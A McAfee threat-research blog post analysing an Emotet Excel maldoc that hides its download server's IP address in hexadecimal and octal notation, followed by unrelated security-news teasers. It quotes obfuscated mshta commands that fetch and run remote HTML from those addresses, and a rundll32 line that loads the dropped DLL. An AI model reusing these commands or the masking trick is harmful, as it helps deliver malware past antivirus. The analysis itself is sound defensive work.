Authored By: Kiran Raj
In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP address which is usually represented by decimal formats. An example of this is shown below:
Hexadecimal format: 0xb907d607
Octal format: 0056.0151.0121.0114
Decimal format: 126.96.36.199
This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.
Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee
The initial attack vector is a phishing email with a Microsoft Excel attachment.
The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.
Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.
On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically resulting in malicious code execution.
Figure 3- Named Manager and Auto_Open triggers
Below are the commands used in Hexadecimal and Octal variants of the Maldocs
cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html
cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html
Figure 4: Process tree of excel execution
Figure 5- Image of HTML page viewed on a browser
The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server
cmd /c C:WindowsSysWow64rundll32.exe C:UsersPublicDocumentsssd.dll,AnyString
McAfee LiveSafe and Total Protection
McAfee LiveSafe and Total Protection
Initial maldoc uses phishing strings to convince users to open the maldoc
Manual execution by user
Command and Control
Standard Application Layer Protocol
Attempts to connect through HTTP
Command and Scripting Interpreter
Starts CMD.EXE for commands execution
Excel uses cmd and PowerShell to execute command
Signed Binary Proxy Execution
Uses RUNDLL32.EXE and MSHTA.EXE to load library
Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.
The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.
Friday Squid Blogging: Creating Batteries Out of Squid Cells
This is fascinating: “When a squid ends up chipping what’s called its ring tooth, which is the nail underneath its...
A Hacker’s Mind News
My latest book continues to sell well. Its ranking hovers between 1,500 and 2,000 on Amazon. It’s been spied in...
Critical flaw in WooCommerce can be used to compromise WordPress websites
WooCommerce, a popular plug-in for running WordPress-based online stores, contains a critical vulnerability that could allow attackers to take over...
Spot and Remove Viruses from Your Android Phone
So, can Android phones get viruses and malware? The answer is yes, and likewise you can do several things to...
CISA Unveils Ransomware Notification Initiative
Provides businesses with early warnings to evict threat actors before they can encrypt data Read More
WooCommerce Patches Critical Plugin Flaw Affecting Half a Million Sites
The vulnerability could allow an unauthenticated attacker to gain admin privileges and take over a website Read More